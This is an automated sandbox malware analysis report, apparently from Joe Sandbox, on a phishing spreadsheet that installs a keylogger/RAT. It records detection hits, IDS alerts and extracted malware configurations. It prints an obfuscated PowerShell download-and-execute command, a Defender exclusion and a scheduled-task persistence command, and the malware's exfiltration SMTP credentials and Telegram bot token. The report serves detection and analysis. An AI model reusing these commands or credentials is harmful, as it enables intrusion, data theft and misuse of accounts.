                        Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 159.203.133.15, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1208, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3096, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sihost[1].exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bKVNuVuE.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bKVNuVuE.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\sihost.exe" , ParentImage: C:\Users\user\AppData\Roaming\sihost.exe, ParentProcessId: 3408, ParentProcessName: sihost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bKVNuVuE.exe", ProcessId: 3472, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bKVNuVuE" /XML "C:\Users\user\AppData\Local\Temp\tmp8AF2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bKVNuVuE" /XML "C:\Users\user\AppData\Local\Temp\tmp8AF2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\sihost.exe" , ParentImage: C:\Users\user\AppData\Roaming\sihost.exe, ParentProcessId: 3408, ParentProcessName: sihost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bKVNuVuE" /XML "C:\Users\user\AppData\Local\Temp\tmp8AF2.tmp", ProcessId: 3488, ProcessName: schtasks.exe
                        Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\sihost.exe, QueryName: checkip.dyndns.org
                        Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1208, Protocol: tcp, SourceIp: 159.203.133.15, SourceIsIpv6: false, SourcePort: 443
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.199.225, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Roaming\sihost.exe, Initiated: true, ProcessId: 3620, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49203
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bKVNuVuE" /XML "C:\Users\user\AppData\Local\Temp\tmp8AF2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bKVNuVuE" /XML "C:\Users\user\AppData\Local\Temp\tmp8AF2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\sihost.exe" , ParentImage: C:\Users\user\AppData\Roaming\sihost.exe, ParentProcessId: 3408, ParentProcessName: sihost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bKVNuVuE" /XML "C:\Users\user\AppData\Local\Temp\tmp8AF2.tmp", ProcessId: 3488, ProcessName: schtasks.exe
                        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3096, TargetFilename: C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.cmdline
                        Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1208, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNDAvc2lob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO1N0YVJULVNMZUVwKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chAr]34+'))')))", CommandLine: POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb
                        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3096, TargetFilename: C:\Users\user\AppData\Local\Temp\1qazuu2n.0yw.ps1

                        Data Obfuscation

                        barindex
                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNDAvc2lob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO1N0YVJULVNMZUVwKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3096, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.cmdline", ProcessId: 3312, ProcessName: csc.exe

                        Persistence and Installation Behavior

                        barindex
                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bKVNuVuE" /XML "C:\Users\user\AppData\Local\Temp\tmp8AF2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bKVNuVuE" /XML "C:\Users\user\AppData\Local\Temp\tmp8AF2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\sihost.exe" , ParentImage: C:\Users\user\AppData\Roaming\sihost.exe, ParentProcessId: 3408, ParentProcessName: sihost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bKVNuVuE" /XML "C:\Users\user\AppData\Local\Temp\tmp8AF2.tmp", ProcessId: 3488, ProcessName: schtasks.exe
                        Timestamp:2024-08-13T20:24:29.441065+0200
                        SID:2024197
                        Severity:1
                        Source Port:80
                        Destination Port:49164
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-13T20:24:57.178970+0200
                        SID:2803274
                        Severity:2
                        Source Port:49175
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Potentially Bad Traffic
                        Timestamp:2024-08-13T20:24:55.151172+0200
                        SID:2803274
                        Severity:2
                        Source Port:49173
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Potentially Bad Traffic
                        Timestamp:2024-08-13T20:24:47.619338+0200
                        SID:2803274
                        Severity:2
                        Source Port:49166
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Potentially Bad Traffic
                        Timestamp:2024-08-13T20:24:59.390779+0200
                        SID:2803274
                        Severity:2
                        Source Port:49177
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Potentially Bad Traffic
                        Timestamp:2024-08-13T20:25:01.590224+0200
                        SID:2803274
                        Severity:2
                        Source Port:49178
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Potentially Bad Traffic
                        Timestamp:2024-08-13T20:24:59.765024+0200
                        SID:2803274
                        Severity:2
                        Source Port:49178
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Potentially Bad Traffic
                        Timestamp:2024-08-13T20:25:32.528663+0200
                        SID:2803305
                        Severity:3
                        Source Port:49198
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-13T20:25:18.333240+0200
                        SID:2803305
                        Severity:3
                        Source Port:49188
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-13T20:24:52.301141+0200
                        SID:2803274
                        Severity:2
                        Source Port:49169
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Potentially Bad Traffic
                        Timestamp:2024-08-13T20:24:25.427583+0200
                        SID:2024197
                        Severity:1
                        Source Port:80
                        Destination Port:49162
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-13T20:25:25.747694+0200
                        SID:2803274
                        Severity:2
                        Source Port:49185
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Potentially Bad Traffic
                        Timestamp:2024-08-13T20:24:53.667052+0200
                        SID:2803274
                        Severity:2
                        Source Port:49171
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Potentially Bad Traffic
                        Timestamp:2024-08-13T20:25:13.446448+0200
                        SID:2803274
                        Severity:2
                        Source Port:49183
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Potentially Bad Traffic
                        Timestamp:2024-08-13T20:25:04.331026+0200
                        SID:2803305
                        Severity:3
                        Source Port:49184
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-13T20:24:50.568228+0200
                        SID:2803305
                        Severity:3
                        Source Port:49168
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-13T20:24:25.427448+0200
                        SID:2024449
                        Severity:1
                        Source Port:49162
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Attempted User Privilege Gain
                        Timestamp:2024-08-13T20:25:30.980799+0200
                        SID:2803274
                        Severity:2
                        Source Port:49194
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Potentially Bad Traffic
                        Timestamp:2024-08-13T20:25:02.001202+0200
                        SID:2803305
                        Severity:3
                        Source Port:49182
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-13T20:24:50.130991+0200
                        SID:2803274
                        Severity:2
                        Source Port:49166
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Potentially Bad Traffic
                        Timestamp:2024-08-13T20:24:29.441030+0200
                        SID:2024449
                        Severity:1
                        Source Port:49164
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Attempted User Privilege Gain
                        Timestamp:2024-08-13T20:25:03.875237+0200
                        SID:2803274
                        Severity:2
                        Source Port:49181
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Potentially Bad Traffic

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                        Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                        Source: https://exi.link/JkAPbLpAvira URL Cloud: Label: phishing
                        Source: https://exi.link/JkAPbLAAAvira URL Cloud: Label: phishing
                        Source: https://exi.link/aAvira URL Cloud: Label: phishing
                        Source: https://exi.link/JkAPbLEAAvira URL Cloud: Label: phishing
                        Source: https://exi.link/S-Avira URL Cloud: Label: phishing
                        Source: https://exi.link/JkAPbLyXAvira URL Cloud: Label: phishing
                        Source: https://exi.link/JkAPbLAvira URL Cloud: Label: phishing
                        Source: https://exi.link/Avira URL Cloud: Label: phishing
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sihost[1].exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen
                        Source: C:\Users\user\AppData\Roaming\sihost.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen
                        Source: 00000011.00000002.625935756.0000000002691000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "jyotis@sixilncoln.com", "Password": "yUiavQX8", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}
                        Source: 12.2.sihost.exe.43da760.5.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Bot Token": "7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU", "Chat id": "403948698", "Email ID": "yUiavQX8", "Password": "us2.smtp.mailhostbox.com", "Host": "favourcloning@gmail.com", "Port": "587", "Version": "4.4"}
                        Source: bKVNuVuE.exe.3560.29.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendMessage"}
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sihost[1].exeReversingLabs: Detection: 42%
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeReversingLabs: Detection: 42%
                        Source: C:\Users\user\AppData\Roaming\sihost.exeReversingLabs: Detection: 42%
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sihost[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\sihost.exeJoe Sandbox ML: detected
                        Source: SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsxJoe Sandbox ML: detected

                        Location Tracking

                        barindex
                        Source: unknownDNS query: name: reallyfreegeoip.org
                        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49167 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49180 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49180 version: TLS 1.0
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                        Source: unknownHTTPS traffic detected: 159.203.133.15:443 -> 192.168.2.22:49161 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 159.203.133.15:443 -> 192.168.2.22:49163 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49199 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49202 version: TLS 1.2
                        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.pdbhP source: powershell.exe, 00000007.00000002.438678228.0000000002876000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.pdb source: powershell.exe, 00000007.00000002.438678228.0000000002876000.00000004.00000800.00020000.00000000.sdmp

                        Software Vulnerabilities

                        barindex
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h17_2_003669F0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 003695C1h17_2_00369300
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00366544h17_2_003663A8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 003676B5h17_2_003674C8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0036803Fh17_2_003674C8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00369B83h17_2_00369770
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0036F461h17_2_0036F181
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h17_2_00367201
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00369B83h17_2_00369A08
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00369B83h17_2_00369AB2
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0036FD91h17_2_0036FAB1
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0036EFC9h17_2_0036ECE8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00366544h17_2_00366593
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0036F8F9h17_2_0036F619
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00366544h17_2_00366605
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0036EB31h17_2_0036E765
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00498A42h17_2_00498748
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0049A22Ah17_2_00499F30
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00490311h17_2_00490040
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00497111h17_2_00496E40
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00494321h17_2_00494050
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0049B54Ah17_2_0049B250
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00492339h17_2_00492068
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00499D62h17_2_00499A68
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00496349h17_2_00496078
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0049F372h17_2_0049F078
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 004910D9h17_2_00490E08
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00497ED9h17_2_00497C08
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0049FD02h17_2_0049FA08
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 004950E9h17_2_00494E18
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00498F0Ah17_2_00498C10
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0049E51Ah17_2_0049E220
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0049CD32h17_2_0049CA38
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00493101h17_2_00492E30
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00493599h17_2_004932C8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0049ABBAh17_2_0049A8C0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 004907A9h17_2_004904D8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 004975A9h17_2_004972D8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 004993D2h17_2_004990D8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 004947B9h17_2_004944E8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0049E9E2h17_2_0049E6E8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0049DB8Ah17_2_0049D890
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0049C3A2h17_2_0049C0A8
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00491571h17_2_004912A0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00498412h17_2_004980A0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00495581h17_2_004952B0
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00495A19h17_2_00495748
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0049F83Ah17_2_0049F540
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0049E052h17_2_0049DD58
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00493A31h17_2_00493760
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00490C41h17_2_00490970
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 00497A41h17_2_00497770
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 4x nop then jmp 0049C86Ah17_2_0049C570
